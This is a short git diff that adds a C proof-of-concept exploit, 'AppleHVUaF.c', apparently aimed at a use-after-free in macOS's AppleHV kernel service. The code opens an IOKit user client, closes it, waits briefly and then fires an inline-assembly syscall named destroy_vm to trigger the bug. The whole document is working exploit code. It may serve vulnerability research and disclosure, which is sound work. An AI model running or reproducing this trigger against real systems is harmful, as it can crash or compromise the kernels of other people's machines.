UaF PoC

Author: rhaym-tech

Exploits/AppleHVUaF.c

@@ -0,0 +1,36 @@
+#include <IOKit/IOKitLib.h>
+#include <mach/mach.h>
+#include <unistd.h>
+#include <stdio.h>
+
+void destroy_vm() {
+    asm("mov $0x03000000, %rax; mov $0x04, %rdi; syscall");
+    return;
+}
+
+int main(int argc, char **argv) {
+
+    const char *service_name = "AppleHV";
+
+    io_service_t service =
+        IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(service_name));
+    if (service == MACH_PORT_NULL) {
+        printf("[-] Cannot get matching service of %s\n", service_name);
+        return 0;
+    }
+    printf("[+] Get matching service of %s succeed, service=0x%x\n", service_name, service);
+
+    io_connect_t client = MACH_PORT_NULL;
+    kern_return_t ret = IOServiceOpen(service, mach_task_self(), 0, &client);
+    if (ret != KERN_SUCCESS) {
+        printf("[-] Open service of %s failed!\n", service_name);
+        return 0;
+    }
+    printf("[+] Create IOUserClient of %s succeed, client=0x%x\n", service_name, client);
+
+    IOServiceClose(client);
+    usleep(5);
+    destroy_vm();
+
+    return 0;
+}